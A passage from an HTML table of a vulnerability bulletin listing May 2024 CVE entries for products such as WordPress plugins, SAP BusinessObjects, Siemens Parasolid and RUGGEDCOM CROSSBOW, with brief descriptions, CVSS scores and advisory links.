<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-51356&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-51356" target="_blank">CVE-2023-51356</a><br><a href="https://patchstack.com/database/vulnerability/armember-membership/wordpress-armember-plugin-4-0-10-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Roku--Indoor Camera SE<br> </td>
<td>A stack-based buffer overflow vulnerability exists in the message parsing functionality of the Roku Indoor Camera SE version 3.0.2.4679 and Wyze Cam v3 version 4.36.11.5859. A specially crafted message can lead to stack-based buffer overflow. An attacker can make authenticated requests to trigger this vulnerability.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-6322&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-6322" target="_blank">CVE-2023-6322</a><br><a href="https://bitdefender.com/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact/" target="_blank">cve-requests@bitdefender.com</a></td>
</tr>
<tr>
<td>Room 34 Creative Services, LLC--ICS Calendar<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Server-Side Request Forgery (SSRF) vulnerability in Room 34 Creative Services, LLC ICS Calendar ics-calendar allows Absolute Path Traversal, : Server Side Request Forgery.This issue affects ICS Calendar: from n/a through 10.12.0.3.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-46784&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46784" target="_blank">CVE-2023-46784</a><br><a href="https://patchstack.com/database/vulnerability/ics-calendar/wordpress-ics-calendar-plugin-10-12-0-2-ssrf-and-arbitrary-file-read-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>SAASPROJECT Booking Package--Booking Package<br> </td>
<td>Improper Privilege Management vulnerability in SAASPROJECT Booking Package Booking Package allows Privilege Escalation.This issue affects Booking Package: from n/a through 1.5.98.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-37389&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-37389" target="_blank">CVE-2023-37389</a><br><a href="https://patchstack.com/database/vulnerability/booking-package/wordpress-booking-package-saasproject-plugin-1-5-98-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP BusinessObjects Business Intelligence Platform<br> </td>
<td>SAP Business Objects Business Intelligence Platform is vulnerable to stored XSS allowing an attacker to manipulate a parameter in the Opendocument URL which could lead to high impact on Confidentiality and Integrity of the application</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28165&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">8.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28165" target="_blank">CVE-2024-28165</a><br><a href="https://me.sap.com/notes/3431794" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SAP_SE--SAP NetWeaver Application Server ABAP and ABAP Platform<br> </td>
<td>An unauthenticated attacker can upload a malicious file to the server which when accessed by a victim can allow an attacker to completely compromise system. </td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33006&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33006" target="_blank">CVE-2024-33006</a><br><a href="https://me.sap.com/notes/3448171" target="_blank">cna@sap.com</a><br><a href="https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html" target="_blank">cna@sap.com</a></td>
</tr>
<tr>
<td>SUBNET--PowerSYSTEM Center<br> </td>
<td>SUBNET Solutions Inc. has identified vulnerabilities in third-party components used in PowerSYSTEM Center.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-28042&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-28042" target="_blank">CVE-2024-28042</a><br><a href="https://www.cisa.gov/news-events/ics-advisories/icsa-24-135-02" target="_blank">ics-cert@hq.dhs.gov</a></td>
</tr>
<tr>
<td>SailPoint--Identity Security Cloud<br> </td>
<td>An issue was identified in the Identity Security Cloud (ISC) Transform preview and IdentityProfile preview API endpoints that allowed an authenticated administrator to execute user-defined templates as part of attribute transforms which could allow remote code execution on the host.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3319&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3319" target="_blank">CVE-2024-3319</a><br><a href="https://www.sailpoint.com/security-advisories/" target="_blank">psirt@sailpoint.com</a></td>
</tr>
<tr>
<td>Saleswonder Team--WebinarIgnition<br> </td>
<td>Improper Privilege Management vulnerability in Saleswonder Team WebinarIgnition allows Privilege Escalation.This issue affects WebinarIgnition: from n/a through 3.05.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-51424&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-51424" target="_blank">CVE-2023-51424</a><br><a href="https://patchstack.com/database/vulnerability/webinar-ignition/wordpress-webinarignition-plugin-3-05-0-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>SiAdmin--SiAdmin<br> </td>
<td>Vulnerability in SiAdmin 1.1 that allows SQL injection via the /modul/mod_pass/aksi_pass.php parameter in nama_lengkap. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in it.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4991&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4991" target="_blank">CVE-2024-4991</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-siadmin" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>SiAdmin--SiAdmin<br> </td>
<td>Vulnerability in SiAdmin 1.1 that allows SQL injection via the /modul/mod_kuliah/aksi_kuliah.php parameter in nim. This vulnerability could allow a remote attacker to send a specially crafted SQL query to the system and retrieve all the information stored in it.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4992&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4992" target="_blank">CVE-2024-4992</a><br><a href="https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-siadmin" target="_blank">cve-coordination@incibe.es</a></td>
</tr>
<tr>
<td>Siemens--CPC80 Central Processing/Communication<br> </td>
<td>A vulnerability has been identified in CPC80 Central Processing/Communication (All versions &lt; V16.41), CPCI85 Central Processing/Communication (All versions &lt; V5.30). The affected device firmwares contain an improper null termination vulnerability while parsing a specific HTTP header. This could allow an attacker to execute code in the context of the current process or lead to denial of service condition.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31484&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31484" target="_blank">CVE-2024-31484</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-871704.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--CPCI85 Central Processing/Communication<br> </td>
<td>A vulnerability has been identified in CPCI85 Central Processing/Communication (All versions &lt; V5.30), SICORE Base system (All versions &lt; V1.3.0). The web interface of affected devices is vulnerable to command injection due to missing server side input sanitation. This could allow an authenticated privileged remote attacker to execute arbitrary code with root privileges.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31485&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31485" target="_blank">CVE-2024-31485</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-871704.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--JT2Go<br> </td>
<td>A vulnerability has been identified in JT2Go (All versions &lt; V2312.0001), Teamcenter Visualization V14.1 (All versions &lt; V14.1.0.13), Teamcenter Visualization V14.2 (All versions &lt; V14.2.0.10), Teamcenter Visualization V14.3 (All versions &lt; V14.3.0.7), Teamcenter Visualization V2312 (All versions &lt; V2312.0001). The affected applications contain a stack overflow vulnerability while parsing specially crafted XML files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34085&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34085" target="_blank">CVE-2024-34085</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-661579.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--JT2Go<br> </td>
<td>A vulnerability has been identified in JT2Go (All versions &lt; V2312.0001), Teamcenter Visualization V14.1 (All versions &lt; V14.1.0.13), Teamcenter Visualization V14.2 (All versions &lt; V14.2.0.10), Teamcenter Visualization V14.3 (All versions &lt; V14.3.0.7), Teamcenter Visualization V2312 (All versions &lt; V2312.0001). The affected applications contain an out of bounds write vulnerability when parsing a specially crafted CGM file. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34086&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34086" target="_blank">CVE-2024-34086</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-661579.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted IGS files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32055&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32055" target="_blank">CVE-2024-32055</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected application contains a type confusion vulnerability while parsing IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21562)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32057&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32057" target="_blank">CVE-2024-32057</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected application is vulnerable to memory corruption while parsing specially crafted IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21563)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32058&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32058" target="_blank">CVE-2024-32058</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21564)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32059&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32059" target="_blank">CVE-2024-32059</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21565)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32060&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32060" target="_blank">CVE-2024-32060</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21566)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32061&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32061" target="_blank">CVE-2024-32061</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected application contains a type confusion vulnerability while parsing IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21568)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32062&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32062" target="_blank">CVE-2024-32062</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected application contains a type confusion vulnerability while parsing IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21573)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32063&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32063" target="_blank">CVE-2024-32063</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21575)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32064&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32064" target="_blank">CVE-2024-32064</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21577)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32065&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32065" target="_blank">CVE-2024-32065</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--PS/IGES Parasolid Translator Component<br> </td>
<td>A vulnerability has been identified in PS/IGES Parasolid Translator Component (All versions &lt; V27.1.215). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted IGS files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-21578)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32066&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32066" target="_blank">CVE-2024-32066</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-976324.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Parasolid V35.1<br> </td>
<td>A vulnerability has been identified in Parasolid V35.1 (All versions &lt; V35.1.256), Parasolid V36.0 (All versions &lt; V36.0.210), Parasolid V36.1 (All versions &lt; V36.1.185). The affected application contains an out of bounds write past the end of an allocated buffer while parsing a specially crafted X_T part file. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-23468)</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31980&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31980" target="_blank">CVE-2024-31980</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-489698.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Parasolid V35.1<br> </td>
<td>A vulnerability has been identified in Parasolid V35.1 (All versions &lt; V35.1.256), Parasolid V36.0 (All versions &lt; V36.0.208), Parasolid V36.1 (All versions &lt; V36.1.173). The affected applications contain an out of bounds read past the unmapped memory region while parsing specially crafted X_T files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32635&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32635" target="_blank">CVE-2024-32635</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-046364.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--Parasolid V35.1<br> </td>
<td>A vulnerability has been identified in Parasolid V35.1 (All versions &lt; V35.1.256), Parasolid V36.0 (All versions &lt; V36.0.208), Parasolid V36.1 (All versions &lt; V36.1.173). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted X_T files. This could allow an attacker to execute code in the context of the current process.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32636&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32636" target="_blank">CVE-2024-32636</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-046364.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--RUGGEDCOM CROSSBOW<br> </td>
<td>A vulnerability has been identified in RUGGEDCOM CROSSBOW (All versions &lt; V5.5). The affected systems allow the upload of arbitrary files of any unauthenticated user. An attacker could leverage this vulnerability and achieve arbitrary code execution with system privileges.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27939&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27939" target="_blank">CVE-2024-27939</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-916916.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--RUGGEDCOM CROSSBOW<br> </td>
<td>A vulnerability has been identified in RUGGEDCOM CROSSBOW (All versions &lt; V5.5). The affected systems allow any authenticated user to send arbitrary SQL commands to the SQL server. An attacker could use this vulnerability to compromise the whole database.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27940&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27940" target="_blank">CVE-2024-27940</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-916916.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--RUGGEDCOM CROSSBOW<br> </td>
<td>A vulnerability has been identified in RUGGEDCOM CROSSBOW (All versions &lt; V5.5). The affected client systems do not properly sanitize input data before sending it to the SQL server. An attacker could use this vulnerability to compromise the whole database.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27941&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27941" target="_blank">CVE-2024-27941</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-916916.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--RUGGEDCOM CROSSBOW<br> </td>
<td>A vulnerability has been identified in RUGGEDCOM CROSSBOW (All versions &lt; V5.5). The affected systems allow any unauthenticated client to disconnect any active user from the server. An attacker could use this vulnerability to prevent any user to perform actions in the system, causing a denial of service situation.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27942&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27942" target="_blank">CVE-2024-27942</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-916916.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--RUGGEDCOM CROSSBOW<br> </td>
<td>A vulnerability has been identified in RUGGEDCOM CROSSBOW (All versions &lt; V5.5). The affected systems allow a privileged user to upload generic files to the root installation directory of the system. By replacing specific files, an attacker could tamper specific files or even achieve remote code execution.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27943&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27943" target="_blank">CVE-2024-27943</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-916916.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--RUGGEDCOM CROSSBOW<br> </td>
<td>A vulnerability has been identified in RUGGEDCOM CROSSBOW (All versions &lt; V5.5). The affected systems allow a privileged user to upload firmware files to the root installation directory of the system. By replacing specific files, an attacker could tamper specific files or even achieve remote code execution.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27944&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27944" target="_blank">CVE-2024-27944</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-916916.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--RUGGEDCOM CROSSBOW<br> </td>
<td>A vulnerability has been identified in RUGGEDCOM CROSSBOW (All versions &lt; V5.5). The bulk import feature of the affected systems allow a privileged user to upload files to the root installation directory of the system. By replacing specific files, an attacker could tamper specific files or even achieve remote code execution.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27945&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27945" target="_blank">CVE-2024-27945</a><br><a href="https://cert-portal.siemens.com/productcert/html/ssa-916916.html" target="_blank">productcert@siemens.com</a></td>
</tr>
<tr>
<td>Siemens--SIMATIC CN 4100<br> </td>
<td>A vulnerability has been identified in SIMATIC CN 4100 (All versions &lt; V3.0). The affected device contains hard coded password which is used for the privileged system user `root` and for the boot loader `GRUB` by default . An attacker who manages to crack the password hash gains root access to the device.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32741&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">10</a></td>
